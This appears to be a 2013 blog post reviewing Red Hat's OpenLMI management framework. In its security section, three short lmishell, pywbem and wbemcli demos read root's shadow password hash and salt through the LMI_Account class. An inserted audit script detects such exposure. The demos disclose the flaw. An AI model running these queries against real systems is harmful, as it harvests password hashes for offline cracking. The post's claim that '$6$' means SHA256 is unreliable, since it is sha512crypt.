According to the OpenLMI project webpage:
OpenLMI provides a common infrastructure for the management of Linux systems. Capabilities include configuration, management and monitoring of hardware, operating systems, and system services. OpenLMI includes a set of services that can be accessed both locally and remotely, multiple language bindings, standard APIs, and standard scripting interfaces.
OpenLMI is another attempt by Red Hat to provide unified management of Linux systems. This is not their first attempt to provide such functionality. Their previous (failed) attempt back in the 2010/2011 era was called Matahari and was based on Apache Qpid QMF (AMQP Messaging – Qpid Management Framework). The Matahari agent framework (matahari-*) packages were deprecated in the Red Hat Enterprise Linux 6.3 release.
It is based on DMTF (Distributed Management Task Force) CIM (Common Information Model). Yes, I hear your groans! I also groaned when I first heard about OpenLMI and its use of CIM. I have many scars from using CIM in the late 1990s. In my humble opinion, some of the CIM schemas make no sense except to individual companies. For example the DMTF networking schema was essentially written by Citrix and is probably only used by Citrix. BTW, DMTF used to be called the Desktop Management Task Force.
The primary focus of OpenLMI appears to be configuring and managing enterprise hardware, especially storage and networks. OpenLMI can be used on either physical servers or on virtual machine guests. By design, OpenLMI provides a common management interface to multiple versions of Red Hat Enterprise Linux (RHEL) and Fedora. It is intended to provide an abstraction layer to hide much of the complexity of the underlying system from systems administrators.
Architecturally, OpenLMI consists of system management agents installed on a managed system, a controller to manage these agents and provide an interface to them, and client applications or scripts which call the management agents through the controller. OpenLMI leverages standards-based infrastructure components already present in RHEL and Fedora, such as the Pegasus CIMOM, but provides new (OpenLMI) system agents. Note that CIMOM (Common Information Model Object Manager) is also a CIM object. System agents are more commonly called providers in OpenLMI.
Providers currently available include:
- Networking – providers for network management
- Account Management – providers for management of users and groups
- Proxy – generator of providers handing over request processing to the CIMOM
- Storage Management – providers for management of storage and mounting. It uses Blivet, the former Anaconda storage library, to manage storage.
- Software Management – providers for management of software
OpenLMI does not attempt to deliver a complete systems management solution. It simply provides the low-level functions, capabilities and interfaces (APIs) that can be called from scripts or system management consoles. Supported interfaces include C, C++, Python, Java, and an OpenLMI shell. These interfaces are implemented as language bindings to the underlying system agents.
Fedora 19 does not install OpenLMI by default. An OpenLMI controller and a set of OpenLMI agents must be installed on the system to be managed. Specifically, OpenLMI requires you to install WBEM (Web-Based Enterprise Management) support on your system. Either OpenPegasus or the Small Footprint CIM Broker (SFCB) package can be used. OpenPegasus is an open-source implementation of the DMTF CIM and WBEM standards. It is written in C++ and is a comprehensive implementation. SFCB is a CIM server for resource-constrained and embedded environments. It is written in C and designed to be modular and lightweight. For the purposes of this blog, I used the OpenPegasus package.
If you use the Pegasus package, a user called pegasus is created on your system. You have to set the password for pegasus using the passwd command and then restart the tog-pegasus service.
Another package that I installed was YAWN (Yet Another WBEM Navigator). YAWN is a web browser-based CIM client. It runs under Apache and requires mod-python. Currently YAWN works with SFCB, Pegasus, and OpenWBEM.
To show you how convoluted and unwieldy CIM namespaces can be, let us use YAWN to explore what CIM exposes. If you point your favourite web browser to http://localhost/yawn/, this is the initial webpage that you should see:
Type in localhost as the Host, and click the Login button. After entering the credentials for the pegasus user, you should see a list of namespaces.
Select root/cimv2 and all the CIM classes for root/cimv2 are displayed.
If you select the Linux_UnixProcess class you will see a webpage something like the following:
Click on the Instance names link to get a listing of all instances of Linux_UnixProcess. Essentially, this is a listing of all the processes on your system:
Here is what the output looks like if I get details of instance (process) number 9:
You can also programmatically obtain information from CIMOM about processes and more. Here is an example of how to use the lmishell to get information about processes.
```
$ cat demo.py
#!/usr/bin/lmishell
c = connect("localhost", "user", "password")
procs = c.root.cimv2.Linux_UnixProcess.instances()
for p in procs:
    # print "{} {} {} {}".format(p.handle, p.ParentProcessID, p.Name, p.CreationDate)
    print "%6s %6s %s %s" % (p.handle, p.ParentProcessID, p.CreationDate, p.Name)

$ ./demo.py
1 0 systemd 20130711002020.000000-300
2 0 kthreadd 20130711002020.000000-300
3 2 ksoftirqd/0 20130711002020.000000-300
5 2 kworker/0:0H 20130711002020.000000-300
7 2 kworker/u:0H 20130711002020.000000-300
8 2 migration/0 20130711002020.000000-300
9 2 rcu_bh 20130711002020.000000-300
10 2 rcu_sched 20130711002020.000000-300
11 2 watchdog/0 20130711002020.000000-300
12 2 watchdog/1 20130711002020.000000-300
13 2 migration/1 20130711002020.000000-300
14 2 ksoftirqd/1 20130711002020.000000-300
16 2 kworker/1:0H 20130711002020.000000-300
17 2 watchdog/2 20130711002020.000000-300
18 2 migration/2 20130711002020.000000-300
19 2 ksoftirqd/2 20130711002020.000000-300
21 2 kworker/2:0H 20130711002020.000000-300
22 2 watchdog/3 20130711002020.000000-300
23 2 migration/3 20130711002020.000000-300
24 2 ksoftirqd/3 20130711002020.000000-300
26 2 kworker/3:0H 20130711002020.000000-300
27 2 khelper 20130711002020.000000-300
28 2 kdevtmpfs 20130711002020.000000-300
29 2 netns 20130711002020.000000-300
30 2 bdi-default 20130711002020.000000-300
31 2 kintegrityd 20130711002020.000000-300
32 2 kblockd 20130711002020.000000-300
33 2 ata_sff 20130711002020.000000-300
34 2 khubd 20130711002020.000000-300
35 2 md 20130711002020.000000-300
60 2 kswapd0 20130711002020.000000-300
61 2 ksmd 20130711002020.000000-300
62 2 khugepaged 20130711002020.000000-300
63 2 fsnotify_mark 20130711002020.000000-300
64 2 crypto 20130711002020.000000-300
72 2 kthrotld 20130711002020.000000-300
75 2 scsi_eh_0 20130711002020.000000-300
76 2 scsi_eh_1 20130711002020.000000-300
77 2 scsi_eh_2 20130711002020.000000-300
78 2 scsi_eh_3 20130711002020.000000-300
79 2 scsi_eh_4 20130711002020.000000-300
80 2 scsi_eh_5 20130711002020.000000-300
86 2 kpsmoused 20130711002020.000000-300
88 2 deferwq 20130711002020.000000-300
96 2 kauditd 20130711002021.000000-300
149 2 kworker/1:1H 20130711002021.000000-300
151 2 scsi_eh_6 20130711002021.000000-300
152 2 scsi_wq_6 20130711002021.000000-300
153 2 kworker/0:1H 20130711002021.000000-300
154 2 kworker/3:1H 20130711002021.000000-300
157 2 kworker/2:1H 20130711002021.000000-300
166 2 jbd2/sda3-8 20130711002027.000000-300
167 2 ext4-dio-unwrit 20130711002027.000000-300
207 1 systemd-journald 20130711002029.000000-300
217 1 lvmetad 20130711002030.000000-300
235 1 systemd-udevd 20130711002031.000000-300
288 2 hd-audio0 20130711002032.000000-300
309 2 kvm-irqfd-clean 20130711002032.000000-300
335 2 jbd2/sda2-8 20130711002035.000000-300
336 2 ext4-dio-unwrit 20130711002035.000000-300
349 2 jbd2/sda5-8 20130711002037.000000-300
350 2 ext4-dio-unwrit 20130711002037.000000-300
353 2 jbd2/sdb1-8 20130711002038.000000-300
354 2 ext4-dio-unwrit 20130711002038.000000-300
359 1 auditd 20130711002038.000000-300
365 359 audispd 20130711002038.000000-300
367 365 sedispatch 20130711002038.000000-300
375 1 alsactl 20130711002038.000000-300
377 1 python 20130711002038.000000-300
379 1 irqbalance 20130711002038.000000-300
382 1 smartd 20130711002038.000000-300
384 1 rsyslogd 20130711002038.000000-300
388 1 systemd-logind 20130711002038.000000-300
389 1 gpm 20130711002038.000000-300
390 1 cupsd 20130711002038.000000-300
391 1 dbus-daemon 20130711002038.000000-300
393 1 chronyd 20130711002038.000000-300
394 1 gdm 20130711002038.000000-300
395 1 crond 20130711002038.000000-300
396 1 atd 20130711002038.000000-300
401 1 acpid 20130711002038.000000-300
403 1 mcelog 20130711002038.000000-300
407 394 gdm-simple-slave 20130711002038.000000-300
413 1 colord 20130711002045.000000-300
415 1 NetworkManager 20130711002045.000000-300
440 407 Xorg 20130711002045.000000-300
455 1 modem-manager 20130711002045.000000-300
461 1 libvirtd 20130711002045.000000-300
465 1 rpcbind 20130711002045.000000-300
483 1 httpd 20130711002045.000000-300
485 1 sshd 20130711002045.000000-300
488 1 accounts-daemon 20130711002045.000000-300
544 1 sendmail: 20130711002045.000000-300
586 1 sendmail: 20130711002045.000000-300
731 1 console-kit-daemon 20130711002046.000000-300
934 1 upowerd 20130711002047.000000-300
1029 1 rtkit-daemon 20130711002047.000000-300
1095 483 httpd 20130711002048.000000-300
1096 483 httpd 20130711002048.000000-300
1097 483 httpd 20130711002048.000000-300
1098 483 httpd 20130711002048.000000-300
1099 483 httpd 20130711002048.000000-300
1123 1 dnsmasq 20130711002048.000000-300
1269 407 gdm-session-worker 20130711002111.000000-300
1277 1 gnome-keyring-daemon 20130711002115.000000-300
1279 1269 gnome-session 20130711002115.000000-300
1287 1 dbus-launch 20130711002115.000000-300
1288 1 dbus-daemon 20130711002115.000000-300
1352 1 gvfsd 20130711002115.000000-300
1373 1 gvfsd-fuse 20130711002115.000000-300
1447 1 at-spi-bus-launcher 20130711002116.000000-300
1451 1447 dbus-daemon 20130711002116.000000-300
1454 1 at-spi2-registryd 20130711002116.000000-300
1463 1279 gnome-settings-daemon 20130711002116.000000-300
1480 1 pulseaudio 20130711002116.000000-300
1502 1 gvfs-udisks2-volume-monitor 20130711002117.000000-300
1504 1 udisksd 20130711002117.000000-300
1509 1480 gconf-helper 20130711002117.000000-300
1512 1 gconfd-2 20130711002117.000000-300
1515 1 gvfs-gphoto2-volume-monitor 20130711002117.000000-300
1519 1 gvfs-afc-volume-monitor 20130711002117.000000-300
1531 1 gsd-printer 20130711002118.000000-300
1533 1 dconf-service 20130711002118.000000-300
1545 1279 gnome-shell 20130711002118.000000-300
1550 1 ibus-daemon 20130711002118.000000-300
1558 1550 ibus-dconf 20130711002118.000000-300
1561 1 ibus-x11 20130711002118.000000-300
1569 1 gnome-shell-calendar-server 20130711002118.000000-300
1577 1 evolution-source-registry 20130711002119.000000-300
1583 1 mission-control-5 20130711002119.000000-300
1588 1550 ibus-engine-simple 20130711002119.000000-300
1590 1 goa-daemon 20130711002119.000000-300
1624 1279 nm-applet 20130711002119.000000-300
1627 1279 python 20130711002119.000000-300
1632 1279 tracker-miner-fs 20130711002119.000000-300
1633 1279 deja-dup-monitor 20130711002119.000000-300
1635 1279 tracker-store 20130711002119.000000-300
1636 1279 evolution-alarm-notify 20130711002120.000000-300
1656 1279 abrt-applet 20130711002120.000000-300
1674 1 evolution-calendar-factory 20130711002121.000000-300
1694 1279 zeitgeist-datahub 20130711002121.000000-300
1701 1 zeitgeist-daemon 20130711002121.000000-300
1755 1 zeitgeist-fts 20130711002121.000000-300
1808 1755 cat 20130711002121.000000-300
1831 1 evolution-addressbook-factory 20130711002122.000000-300
1873 1 gvfsd-burn 20130711002124.000000-300
3152 2 lpfc_worker_0 20130711034101.000000-300
3155 2 kworker/u:28 20130711034101.000000-300
3156 2 kworker/u:29 20130711034101.000000-300
3764 1 gnome-terminal-server 20130711044843.000000-300
3767 3764 gnome-pty-helper 20130711044843.000000-300
3768 3764 bash 20130711044843.000000-300
6306 415 dhclient 20130711121940.000000-300
6690 1 gvfsd-metadata 20130711131148.000000-300
7069 1 gvfsd-trash 20130711140717.000000-300
7423 2 kworker/3:2 20130711141548.000000-300
7513 1 polkitd 20130711144803.000000-300
8389 2 kworker/2:2 20130711170830.000000-300
8404 2 kworker/1:0 20130711171356.000000-300
8453 2 kworker/1:1 20130711172515.000000-300
8567 1545 firefox 20130711174340.000000-300
8642 483 httpd 20130711174402.000000-300
8644 483 httpd 20130711174403.000000-300
8808 2 kworker/3:0 20130711175401.000000-300
8843 1 cimserver 20130711175750.000000-300
9060 2 kworker/0:0 20130711180701.000000-300
9205 2 flush-8:0 20130711183706.000000-300
9237 2 flush-8:16 20130711190030.000000-300
9260 2 kworker/2:0 20130711190100.000000-300
9589 483 httpd 20130711191642.000000-300
9590 483 httpd 20130711191643.000000-300
9591 483 httpd 20130711191643.000000-300
9906 3764 bash 20130711193523.000000-300
9994 2 kworker/0:1 20130711193700.000000-300
10063 8567 plugin-container 20130711193829.000000-300
10096 1545 nautilus 20130711193959.000000-300
10155 1 cimprovagt 20130711194458.000000-300
10194 1 packagekitd 20130711194803.000000-300
10229 3768 python 20130711194912.000000-300
10230 10155 sh None
10231 10230 ps None
```
Security in OpenLMI is problematic. For example, I can, as a regular user, return the encoded password of another user if I know the CIMOM username and password.
```
$ cat demo1.py
#!/bin/lmishell
c = connect("localhost", "username", "password")
p = c.root.cimv2.LMI_Account.first_instance(key="name", value="root")
print "{} {}".format(p.Name, p.userPassword)

$ ./demo1.py
root [u'$6$OeHcJ066CyxGYah5$248KbUKRDZ/d8JAbouLsmkLTXZhAQeUMrY8YaMlF5kAQt754logoG9VwuWrLcaCPb0b3lcw0Qui2kBNRmGJNx0']
```
Note how easy it is to retrieve the encrypted password for root from /etc/shadow. We also get the password encoding scheme (6 = SHA256) and the salt!
```
$ cat demo2.py
#!/bin/python
import pywbem

url = "https://localhost:5989"
username = "pegasus"
password = "password"

c = pywbem.WBEMConnection(url, (username, password),)
slct = 'select Name, userPassword from LMI_Account where Name = "root"'
#print c.ExecQuery('WQL', slct)[0].tomof()
p = c.ExecQuery('WQL', 'select Name, userPassword from LMI_Account where Name = "root"')
print p[0].tomof()

$ ./demo2.py
instance of LMI_Account {
    UserPassword = {"$6$OeHdJ066CyxGYah5$248KbUPRDZ/d8JAbouLsmkLTXZqAQeUMrY8YxMlF2kAQt754lggoG9VsuWrLcaCPb0b4lcw0Qui2kKNRmAJNx0"};
    Name = "root";
};
```
As you can see from the above, this is not a specific problem with lmishell; it is a systematic problem. pywbem is a Python library for making CIM operations over HTTP using the WBEM CIM-XML protocol. YAWN also uses pywbem. In pywbem, the local namespace is root/cimv2.
If you install the sblim-wbemcli package you can also access this data using wbemcli:
```
$ wbemcli -noverify gi -nl 'https://pegasus:password@localhost:5989/root/cimv2:LMI_Account.Name="root",CreationClassName="LMI_Account",SystemCreationClassName="Linux_ComputerSystem",SystemName="ultra.xfpmurphy.com"'
localhost:5989/root/cimv2:LMI_Account.Name="root",CreationClassName="LMI_Account",SystemCreationClassName="Linux_ComputerSystem",SystemName="ultra.xfpmurphy.com"
-InstanceID=
-Caption=
-Description=
-ElementName="root"
-Generation=
-InstallDate=
-OperationalStatus=
-StatusDescriptions=
-Status=
-HealthState=
-CommunicationStatus=
-DetailedStatus=
-OperatingStatus=
-PrimaryStatus=
-EnabledState=5
-OtherEnabledState=
-RequestedState=12
-EnabledDefault=2
-TimeOfLastStateChange=
-AvailableRequestedStates=
-TransitioningToState=12
-SystemCreationClassName="Linux_ComputerSystem"
-SystemName="ultra.xfpmurphy.com"
-CreationClassName="LMI_Account"
-Name="root"
-UserID="0"
-ObjectClass=
-Descriptions=
-Host="ultra.xfpmurphy.com"
-LocalityName=
-OrganizationName=""
-OU=
-SeeAlso=
-UserCertificate=
-UserPassword="$6$OeHcJ066CyxGYah5$268KbUKRDZ/d8JAGoismkLTXZqAQeUOrY8YxMlF5kAQt754lggoG9VsuWrLcaCPb0b3lcw0Qui2kKNRmGJNx0"
-PasswordHistoryDepth=
-PasswordExpiration=
-ComplexPasswordRulesEnforced=
-InactivityTimeout=
-MaximumSuccessiveLoginFailures=
-LastLogin=20130704161216.000000+000
-UserPasswordEncryptionAlgorithm=
-OtherUserPasswordEncryptionAlgorithm=
-UserPasswordEncoding=2
-HomeDirectory="/root"
-LoginShell="/bin/bash"
-PasswordLastChange=20120519000000.000000+000
-PasswordPossibleChange=00000000000000.000000:000
-PasswordExpirationWarning=
-PasswordInactivation=
-AccountExpiration=
```
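An audit check for the exposure shown above, as an added example that is not part of the original post or of OpenLMI: it parses "-Property=value" lines in the style of the wbemcli output and reports any property whose value is a crypt(3) hash (the $1$, $5$ and $6$ prefixes select md5crypt, sha256crypt and sha512crypt), without echoing the digest. The sample dump, account name and salt are constructed, and the function names are hypothetical.

```python
import re

# crypt(3) modular format: $<id>$[rounds=N$]<salt>$<digest>
# Only the ids below are recognised; other schemes are out of scope here.
SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
CRYPT_RE = re.compile(
    r"^\$(?P<id>[156])\$(?:rounds=\d+\$)?"
    r"(?P<salt>[./0-9A-Za-z]{1,16})\$(?P<digest>[./0-9A-Za-z]+)$"
)


def parse_properties(dump):
    """Turn '-Prop=value' lines (wbemcli -nl style) into a dict."""
    props = {}
    for line in dump.splitlines():
        line = line.strip()
        if line.startswith("-") and "=" in line:
            name, _, value = line[1:].partition("=")
            props[name] = value.strip('"')
    return props


def find_exposed_hashes(dump):
    """Report properties that carry a password hash; digests are not echoed."""
    props = parse_properties(dump)
    findings = []
    for name, value in props.items():
        m = CRYPT_RE.match(value)
        if m:
            findings.append({
                "account": props.get("Name", "?"),
                "property": name,
                "scheme": SCHEMES[m.group("id")],
                "salt_len": len(m.group("salt")),
                "digest_len": len(m.group("digest")),
            })
    return findings


# Constructed sample: account, salt and digest are made up for this example.
FAKE_HASH = "$6$ConstructedSalt1$" + "x" * 86
SAMPLE = "\n".join([
    '-Name="alice"',
    '-UserID="1001"',
    '-UserPassword="' + FAKE_HASH + '"',
    '-LoginShell="/bin/bash"',
])
LOCKED = SAMPLE.replace(FAKE_HASH, "!!")  # locked account: nothing to report

if __name__ == "__main__":
    for finding in find_exposed_hashes(SAMPLE):
        print(finding)
    print(find_exposed_hashes(LOCKED))
```

Run it over instance dumps fetched with an unprivileged CIMOM account on your own systems; any finding means the provider hands shadow hashes to that account.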
OpenLMI is in the early stage of development. Not all functionality is available. The OpenLMI developers appear to welcome input from interested parties and that is goodness. Will OpenLMI succeed? Possibly if OpenLMI successfully integrates with established control panels like cPanel or Plesk. However, until the security holes in OpenLMI are plugged, no system administrator should deploy OpenLMI on any systems that need to be secure.